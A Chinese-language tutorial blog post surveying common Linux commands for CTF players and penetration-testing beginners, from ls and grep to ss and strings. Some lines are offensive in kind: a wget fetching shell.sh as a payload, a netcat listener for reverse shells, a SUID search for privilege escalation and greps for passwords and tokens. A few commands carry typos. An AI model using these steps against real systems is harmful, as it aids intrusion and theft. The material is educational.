前言

在网络安全领域，Linux 命令不是“工具”，而是语言。
你能读懂多少命令，决定了你能走多远。

本文从网络安全实战视角出发，全面梳理 Linux 在网安中的高频命令与使用场景，适合：

• • 🧑‍🎓 网安 / 信安专业学生
• • 🏁 CTF 入门与进阶选手
• • 🔍 渗透测试与应急响应初学者

一、文件系统与信息收集（侦察阶段）

1️⃣ ls —— 文件情报的第一眼

ls
ls -lh
ls -la

关注点：

• • 隐藏文件（.env / .git / .ssh）
• • 文件权限是否异常
• • 是否存在备份文件（*.bak / *.old）

2️⃣ tree —— 快速掌握目录结构

tree
tree -L 2

📌 渗透中常用来理解 Web 目录结构

3️⃣ file —— 判断文件真实类型（必背）

file unknown

可识别：

• • ELF 可执行文件
• • Shell / Python 脚本
• • 压缩包 / 图片 / 数据文件

⚠️ 比看后缀名可靠 100 倍

4️⃣ stat —— 文件元数据分析

stat file.txt

📌 可用于判断文件是否被篡改、时间线分析

二、文本分析与日志处理（蓝队核心）

5️⃣ cat / tac / nl

cat file.txt
tac file.txt
nl file.txt

📌 查看顺序、行号，适合分析配置与脚本

6️⃣ less —— 日志分析神器

less access.log

常用快捷键：

• • /keyword 搜索
• • n / N 跳转
• • G / gg 到末尾 / 开头

7️⃣ grep —— 文本检索之王

grep "flag" file.txt
grep -i "password" *
grep -R "token" /var/www

📌 CTF / 应急响应最常用命令

8️⃣ awk —— 半自动日志分析

awk '{print $1}' access.log
awk -F ':''{print $2}' passwd

📌 可快速提取 IP / 用户名 / 参数

9️⃣ sed —— 批量替换 / 清洗数据

sed 's/admin/root/g' file.txt

🔟 wc —— 快速统计

wc -l
wc -c

📌 判断字典规模、日志体量

三、权限、用户与提权（红队重点）

11️⃣ whoami / id / groups

whoami
id
groups

📌 判断当前权限、所属用户组

12️⃣ chmod / chown

chmod +x exploit.sh
chown root:root file

13️⃣ sudo -l —— 提权第一检查项

sudo -l

📌 可运行的 root 命令 = 潜在提权点

14️⃣ 查找 SUID 文件（⭐高频）

find / -perm -4000 2>/dev/null

15️⃣ 查找敏感配置

find / -name "*.conf" 2>/dev/null

四、进程与系统分析（攻防通用）

16️⃣ ps —— 查看进程

ps aux
ps -ef

📌 关注 root 进程、异常服务

17️⃣ top / htop

top

📌 判断是否存在异常消耗资源的程序

18️⃣ uname / lsb_release

uname -a
lsb_release -a

📌 查找内核漏洞 / Exploit

五、网络相关命令（渗透测试核心）

19️⃣ ip / ifconfig

ip a
ip route

20️⃣ ss / netstat

ss -tulnp
netstat -anp

📌 发现内网服务 / 后门监听

21️⃣ ping / traceroute

ping target
traceroute target

22️⃣ curl / wget —— 攻防万金油

curl http://127.0.0.1
curl -X POST -d "a=1" url
wget http://x/shell.sh

📌 API 测试 / 下载 payload / SSRF 验证

23️⃣ nc —— Netcat（CTF 神器）

nc -lvnp 4444
nc target 80

📌 反弹 shell / 端口通信

六、压缩、编码与取证辅助

24️⃣ 压缩解压

tar -xvf file.tar
tar -zxf file.tar.gz
unzip file.zip

25️⃣ 编码解码

base64 file
base64 -d file

📌 CTF 密码学 / Web 题常见

26️⃣ strings —— 逆向 & 取证利器

strings binary

📌 查找明文密码 / URL / flag

27️⃣ xxd / hexdump

xxd file

📌 二进制分析 / 文件修复

七、自动化与效率提升（高手标志）

28️⃣ 管道与重定向

catlog | grep error | wc -l

29️⃣ 后台执行

command &
nohupcommand &

30️⃣ Bash 历史

history
!123

📌 .bash_history 经常藏秘密

八、网安学习建议（非常重要）

命令不是死记硬背的，而是场景驱动的

📌 推荐训练方式：

• • Kali / Ubuntu 实机练习
• • 每个命令都配一个网安场景
• • CTF 做完后复盘「用到了哪些命令」

九、结语

Linux 对网安非常重要,本文只是列举一些常用的。

如果你能熟练使用本文中的命令：

• • CTF 做题效率会明显提升
• • 看 Writeup 不再一脸懵
• • 实战渗透思路会越来越清晰

拜拜~